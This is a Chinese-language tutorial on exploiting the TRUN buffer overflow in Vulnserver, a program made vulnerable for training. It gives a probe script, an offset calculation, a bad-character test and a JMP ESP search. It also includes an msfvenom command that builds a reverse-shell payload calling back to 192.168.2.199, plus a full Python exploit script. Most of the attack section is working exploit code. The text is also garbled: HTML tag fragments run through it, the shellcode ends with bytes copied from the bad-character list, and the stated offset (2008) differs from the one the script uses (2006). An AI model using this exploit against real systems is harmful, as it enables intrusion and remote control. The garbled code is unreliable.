Vulnserver.exe漏洞分析及利用教学文档<\/h1>

一、环境准备与初步探测<\/h2>

1. 目标程序概述<\/h3>
Vulnserver是一个存在漏洞的Windows服务程序<\/li>
默认运行在TCP 9999端口<\/li>
提供多个命令功能，其中TRUN命令存在缓冲区溢出漏洞<\/li> <\/ul>
2. 调试工具准备<\/h3>
IDA Pro：用于静态分析程序结构<\/li>
WinDbg：用于动态调试程序执行<\/li>
Python：用于编写漏洞利用脚本<\/li> <\/ul>
3. 初始探测脚本<\/h3>
#!\/usr\/bin\/python<\/span>
<\/span><\/span>import<\/span> socket
<\/span><\/span>import<\/span> sys
<\/span><\/span>from<\/span> struct import<\/span> pack
<\/span><\/span>
<\/span><\/span>try<\/span>:
<\/span><\/span>    server =<\/span> sys.<\/span>argv[1<\/span>]
<\/span><\/span>    port =<\/span> 9999<\/span>
<\/span><\/span>    size =<\/span> 10<\/span>
<\/span><\/span>    inputBuffer =<\/span> b<\/span>"<\/span>\\<\/span>x41"<\/span> *<\/span> size
<\/span><\/span>    buf =<\/span> inputBuffer
<\/span><\/span>    
<\/span><\/span>    print("Sending evil buffer..."<\/span>)
<\/span><\/span>    s =<\/span> socket.<\/span>socket(socket.<\/span>AF_INET, socket.<\/span>SOCK_STREAM)
<\/span><\/span>    s.<\/span>connect((server, port))
<\/span><\/span>    s.<\/span>send(buf)
<\/span><\/span>    s.<\/span>close()
<\/span><\/span>    print("Done!"<\/span>)
<\/span><\/span>except<\/span> socket.<\/span>error:
<\/span><\/span>    print("Could not connect!"<\/span>)
<\/span><\/span><\/code><\/pre>二、程序功能分析<\/h2>
1. 网络通信分析<\/h3>

程序使用WS2_32.dll进行网络通信<\/li>
关键函数调用流程：

recv接收数据<\/li>
处理接收到的数据<\/li>
根据命令执行不同功能<\/li>
<\/ol>
<\/li>
<\/ul>
2. 命令处理结构<\/h3>

程序使用strncmp比较输入命令<\/li>
命令格式要求严格（如"HELP "需要包含空格）<\/li>
主要命令包括：HELP、TRUN等<\/li>
<\/ul>
3. TRUN命令分析<\/h3>

命令格式："TRUN ."后跟数据<\/li>
处理流程：

malloc分配3000字节缓冲区<\/li>
memset初始化缓冲区<\/li>
检查输入数据长度<\/li>
比较数据中是否包含"."字符<\/li>
调用Function3处理数据<\/li>
<\/ol>
<\/li>
<\/ul>
三、漏洞定位与分析<\/h2>
1. 漏洞位置<\/h3>

Function3函数中存在strcpy缓冲区溢出漏洞<\/li>
strcpy函数特性：

不检查目标缓冲区大小<\/li>
会一直复制直到遇到NULL字节<\/li>
导致可以覆盖堆栈上的返回地址<\/li>
<\/ul>
<\/li>
<\/ul>
2. 漏洞验证<\/h3>

发送超长TRUN命令数据：<\/li>
<\/ul>
inputBuffer =<\/span> b<\/span>"TRUN ."<\/span> +<\/span> b<\/span>"<\/span>\\<\/span>x41"<\/span> *<\/span> 2008<\/span> +<\/span> b<\/span>"BBBB"<\/span>
<\/span><\/span><\/code><\/pre>
观察WinDbg中返回地址被覆盖为0x42424242<\/li>
<\/ul>
3. 偏移量计算<\/h3>

在strcpy处下断点<\/li>
使用!teb<\/code>确认目标地址在堆栈范围内<\/li>
计算返回地址与目标缓冲区的偏移：

返回地址：0x0308f1e8<\/li>
缓冲区地址：0x0308e9e0<\/li>
偏移量：0x0308f1e8 - 0x0308e9e0 = 2008字节<\/li>
<\/ul>
<\/li>
<\/ol>
四、漏洞利用开发<\/h2>
1. 坏字符检测<\/h3>

发送包含所有可能字符的测试数据：<\/li>
<\/ul>
badchars =<\/span> (
<\/span><\/span>    b<\/span>"<\/span>\\<\/span>x01<\/span>\\<\/span>x02<\/span>\\<\/span>x03<\/span>\\<\/span>x04<\/span>\\<\/span>x05<\/span>\\<\/span>x06<\/span>\\<\/span>x07<\/span>\\<\/span>x08<\/span>\\<\/span>x09<\/span>\\<\/span>x0a<\/span>\\<\/span>x0b<\/span>\\<\/span>x0c<\/span>\\<\/span>x0d<\/span>\\<\/span>x0e<\/span>\\<\/span>x0f<\/span>\\<\/span>x10"<\/span>
<\/span><\/span>    # ... 省略完整列表 ...<\/span>
<\/span><\/span>    b<\/span>"<\/span>\\<\/span>xf1<\/span>\\<\/span>xf2<\/span>\\<\/span>x3<\/span>\\<\/span>xf4<\/span>\\<\/span>xf5<\/span>\\<\/span>xf6<\/span>\\<\/span>xf7<\/span>\\<\/span>xf8<\/span>\\<\/span>xf9<\/span>\\<\/span>xfa<\/span>\\<\/span>xfb<\/span>\\<\/span>xfc<\/span>\\<\/span>xfd<\/span>\\<\/span>xfe<\/span>\\<\/span>xff"<\/span>
<\/span><\/span>)
<\/span><\/span><\/code><\/pre>
确认无坏字符（NULL字节0x00除外）<\/li>
<\/ul>
2. JMP ESP指令查找<\/h3>

使用WinDbg查找可用的JMP ESP指令：
!py mona jmp -r esp
<\/code><\/pre>
<\/li>
找到地址：0x625011af（需转换为小端格式"\xaf\x11\x50\x62"）<\/li>
<\/ul>
3. Shellcode生成<\/h3>

使用msfvenom生成反向shell payload：
msfvenom -p windows\/meterpreter\/reverse_tcp LHOST=192.168.2.199 LPORT=443 -f c -e x86\/shikata_ga_nai -b "\\x00" -f python -v shellcode
<\/code><\/pre>
<\/li>
添加NOP雪橇保证执行稳定性<\/li>
<\/ul>
五、完整利用脚本<\/h2>
#!\/usr\/bin\/python<\/span>
<\/span><\/span>import<\/span> socket
<\/span><\/span>import<\/span> sys
<\/span><\/span>from<\/span> struct import<\/span> pack
<\/span><\/span>
<\/span><\/span>try<\/span>:
<\/span><\/span>    server =<\/span> sys.<\/span>argv[1<\/span>]
<\/span><\/span>    port =<\/span> 9999<\/span>
<\/span><\/span>    size =<\/span> 2006<\/span>
<\/span><\/span>    
<\/span><\/span>    # NOP sled + shellcode<\/span>
<\/span><\/span>    shellcode =<\/span> b<\/span>"<\/span>\\<\/span>x90"<\/span> *<\/span> 20<\/span>
<\/span><\/span>    shellcode +=<\/span> b<\/span>"<\/span>\\<\/span>xda<\/span>\\<\/span>xd6<\/span>\\<\/span>xbe<\/span>\\<\/span>x8a<\/span>\\<\/span>xc0<\/span>\\<\/span>x3b<\/span>\\<\/span>xdd<\/span>\\<\/span>xd9<\/span>\\<\/span>x74<\/span>\\<\/span>x24<\/span>\\<\/span>xf4"<\/span>
<\/span><\/span>    shellcode +=<\/span> b<\/span>"<\/span>\\<\/span>x5b<\/span>\\<\/span>x2b<\/span>\\<\/span>xc9<\/span>\\<\/span>xb1<\/span>\\<\/span>x59<\/span>\\<\/span>x31<\/span>\\<\/span>x73<\/span>\\<\/span>x19<\/span>\\<\/span>x83<\/span>\\<\/span>xc3<\/span>\\<\/span>x04"<\/span>
<\/span><\/span>    # ... 省略完整shellcode ...<\/span>
<\/span><\/span>    shellcode +=<\/span> b<\/span>"<\/span>\\<\/span>xf1<\/span>\\<\/span>xf2<\/span>\\<\/span>x3<\/span>\\<\/span>xf4<\/span>\\<\/span>xf5<\/span>\\<\/span>xf6<\/span>\\<\/span>xf7<\/span>\\<\/span>xf8<\/span>\\<\/span>xf9<\/span>\\<\/span>xfa<\/span>\\<\/span>xfb"<\/span>
<\/span><\/span>    
<\/span><\/span>    # 构造完整payload<\/span>
<\/span><\/span>    inputBuffer =<\/span> b<\/span>"TRUN ."<\/span> +<\/span> b<\/span>"<\/span>\\<\/span>x41"<\/span> *<\/span> size +<\/span> b<\/span>"<\/span>\\<\/span>xaf<\/span>\\<\/span>x11<\/span>\\<\/span>x50<\/span>\\<\/span>x62"<\/span> +<\/span> shellcode
<\/span><\/span>    buf =<\/span> inputBuffer
<\/span><\/span>    
<\/span><\/span>    print("Sending evil buffer..."<\/span>)
<\/span><\/span>    s =<\/span> socket.<\/span>socket(socket.<\/span>AF_INET, socket.<\/span>SOCK_STREAM)
<\/span><\/span>    s.<\/span>connect((server, port))
<\/span><\/span>    s.<\/span>send(buf)
<\/span><\/span>    s.<\/span>close()
<\/span><\/span>    print("Done!"<\/span>)
<\/span><\/span>except<\/span> socket.<\/span>error:
<\/span><\/span>    print("Could not connect!"<\/span>)
<\/span><\/span><\/code><\/pre>六、防御建议<\/h2>

使用安全的字符串函数（如strncpy替代strcpy）<\/li>
实现输入长度检查<\/li>
启用堆栈保护机制（如GS、DEP）<\/li>
使用地址空间布局随机化（ASLR）<\/li>
进行严格的输入验证<\/li>
<\/ol>
七、扩展学习<\/h2>

其他命令的漏洞分析（如GMON、KSTET等）<\/li>
SEH覆盖利用技术<\/li>
ROP链构造技术<\/li>
现代缓解措施的绕过技术<\/li>
<\/ol>
通过本教程，您应该掌握了从程序分析、漏洞定位到完整利用开发的完整流程，以及相关的调试技术和工具使用方法。<\/p>